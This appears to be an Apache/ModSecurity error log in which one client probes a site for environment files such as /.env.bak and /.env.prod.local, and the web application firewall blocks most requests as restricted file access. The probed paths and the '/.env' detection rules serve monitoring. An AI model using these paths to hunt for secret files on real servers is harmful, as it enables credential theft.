[Tue Dec 02 08:38:21.231237 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aS6XbZvtKXnzGjDKyabjIwAAAAk"]
[Tue Dec 02 08:38:21.231420 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aS6XbZvtKXnzGjDKyabjIwAAAAk"]
[Tue Dec 02 08:38:21.231637 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aS6XbZvtKXnzGjDKyabjIwAAAAk"]
[Tue Dec 02 08:38:21.231892 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aS6XbZvtKXnzGjDKyabjIwAAAAk"]
[Tue Dec 02 08:38:21.262900 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aS6XbZvtKXnzGjDKyabjJAAAAAk"]
[Tue Dec 02 08:38:21.263132 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aS6XbZvtKXnzGjDKyabjJAAAAAk"]
[Tue Dec 02 08:38:21.263396 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aS6XbZvtKXnzGjDKyabjJAAAAAk"]
[Tue Dec 02 08:38:21.294639 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aS6XbZvtKXnzGjDKyabjJQAAAAk"]
[Tue Dec 02 08:38:21.294818 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aS6XbZvtKXnzGjDKyabjJQAAAAk"]
[Tue Dec 02 08:38:21.295065 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aS6XbZvtKXnzGjDKyabjJQAAAAk"]
[Tue Dec 02 08:38:21.295332 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aS6XbZvtKXnzGjDKyabjJQAAAAk"]
[Tue Dec 02 08:38:21.326679 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.1"] [unique_id "aS6XbZvtKXnzGjDKyabjJgAAAAk"]
[Tue Dec 02 08:38:21.326908 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.1"] [unique_id "aS6XbZvtKXnzGjDKyabjJgAAAAk"]
[Tue Dec 02 08:38:21.327120 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.1"] [unique_id "aS6XbZvtKXnzGjDKyabjJgAAAAk"]
[Tue Dec 02 08:38:21.358555 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.2"] [unique_id "aS6XbZvtKXnzGjDKyabjJwAAAAk"]
[Tue Dec 02 08:38:21.358777 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.2"] [unique_id "aS6XbZvtKXnzGjDKyabjJwAAAAk"]
[Tue Dec 02 08:38:21.358972 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.2"] [unique_id "aS6XbZvtKXnzGjDKyabjJwAAAAk"]
[Tue Dec 02 08:38:21.390097 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod.local"] [unique_id "aS6XbZvtKXnzGjDKyabjKAAAAAk"]
[Tue Dec 02 08:38:21.390375 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod.local"] [unique_id "aS6XbZvtKXnzGjDKyabjKAAAAAk"]
[Tue Dec 02 08:38:21.390573 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod.local"] [unique_id "aS6XbZvtKXnzGjDKyabjKAAAAAk"]
[Tue Dec 02 08:38:21.421781 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.dev.local"] [unique_id "aS6XbZvtKXnzGjDKyabjKQAAAAk"]
[Tue Dec 02 08:38:21.422000 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.dev.local"] [unique_id "aS6XbZvtKXnzGjDKyabjKQAAAAk"]
[Tue Dec 02 08:38:21.422207 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.dev.local"] [unique_id "aS6XbZvtKXnzGjDKyabjKQAAAAk"]
[Tue Dec 02 08:38:21.454148 2025] [authz_core:error] [pid 468147] [client 18.133.245.137:47928] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Tue Dec 02 08:38:21.488125 2025] [authz_core:error] [pid 468147] [client 18.133.245.137:47928] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env
[Tue Dec 02 08:38:21.520020 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjLAAAAAk"]
[Tue Dec 02 08:38:21.520244 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjLAAAAAk"]
[Tue Dec 02 08:38:21.520437 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjLAAAAAk"]
[Tue Dec 02 08:38:21.551753 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjLQAAAAk"]
[Tue Dec 02 08:38:21.552060 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjLQAAAAk"]
[Tue Dec 02 08:38:21.552333 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjLQAAAAk"]
[Tue Dec 02 08:38:21.583797 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjLgAAAAk"]
[Tue Dec 02 08:38:21.584080 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjLgAAAAk"]
[Tue Dec 02 08:38:21.584305 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjLgAAAAk"]
[Tue Dec 02 08:38:21.615391 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjLwAAAAk"]
[Tue Dec 02 08:38:21.615605 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjLwAAAAk"]
[Tue Dec 02 08:38:21.615800 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjLwAAAAk"]
[Tue Dec 02 08:38:21.647200 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjMAAAAAk"]
[Tue Dec 02 08:38:21.647441 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjMAAAAAk"]
[Tue Dec 02 08:38:21.647640 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/app/.env"] [unique_id "aS6XbZvtKXnzGjDKyabjMAAAAAk"]
